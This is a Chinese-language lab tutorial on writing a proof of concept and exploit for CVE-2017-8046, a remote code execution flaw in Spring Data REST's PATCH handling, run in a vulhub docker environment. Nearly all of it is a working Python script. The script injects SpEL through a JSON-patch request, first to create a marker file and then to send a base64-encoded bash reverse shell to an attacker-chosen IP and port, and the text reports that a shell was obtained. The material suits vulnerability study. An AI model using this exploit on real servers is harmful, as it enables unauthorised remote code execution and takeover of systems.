本文只要是学习poc、exp的编写,对于漏洞的原理不进行深入的介绍。
环境搭建
cd vulhub-master/spring/CVE-2017-8046
docker-compose up -d
漏洞原理
漏洞的原因是对PATCH方法处理不当,导致攻击者能够利用JSON数据造成RCE。本质还是因为Spring的SPEL解析导致的RCE。
影响版本
- Spring Data REST组件的2.6.9 and 3.0.9之前的版本(不包含2.6.9和3.0.9 )
- Spring Boot (如果使用了Spring Data REST模块)的1.5.9 和 2.0 M6之前的版本
POC、EXP
import base64
import os
import requests
import json
header = {
"Content-Type": "application/json-patch+json"
}
path = "/customers/1"
def poc(url):
cmd = "touch /tmp/success"
cmdUnicode = strToAscii(cmd)
payload=f"{cmdUnicode}".replace("[", "{").replace("]", "}")
data=[{
"op": "replace",
"path": f"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{payload}))/lastname",
"value": "vulhub"
}]
payloadData=json.dumps(data)
html=requests.patch(url=url+path,headers=header,data=payloadData).text
number = os.path.basename(__file__).split('.')[0]
if html.find("EL1010E: Property")>0:
outPocTrue(number, url, path)
else:
outPocFalse(number, url, path)
def exp(url,lhost,lport):
cmd = bash(lhost,lport)
cmdUnicode = strToAscii(cmd)
payload = f"{cmdUnicode}".replace("[", "{").replace("]", "}")
data = [{
"op": "replace",
"path": f"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{payload}))/lastname",
"value": "vulhub"
}]
payloadData = json.dumps(data)
requests.patch(url=url + path, headers=header, data=payloadData).text
def true_url(url):
if url[-1] == '/':
url=url[0:-1]
if url.find("http"):
url = 'http://' + url
return url
def bash(ip,port):
m = f'bash -i >& /dev/tcp/{ip}/{port} 0>&1'
s = str(base64.b64encode(m.encode('utf-8')), 'utf-8')
bash_code = 'bash -c {echo,' + s + '}|{base64,-d}|{bash,-i}'
return bash_code
def strToAscii(code):
poc=[]
for i in code:
poc.append(ord(i))
return poc
def outPocTrue(number,url,path):
print(f"[+] The VULN {number} exists, path is : {url}{path}")
def outPocFalse(number,url,path):
print(f"[-] The VULN {number} no exists")
def bash64ToAscii(code):
poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(code[0])
for ch in code[1:]:
poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)
poc += ')}'
return poc
url= true_url("192.168.29.129:8080")
ip='192.168.29.135'
port='6666'
poc(url)
exp(url,ip,port)
运行之后,成功验证了漏洞的存在,并且成功反弹了shell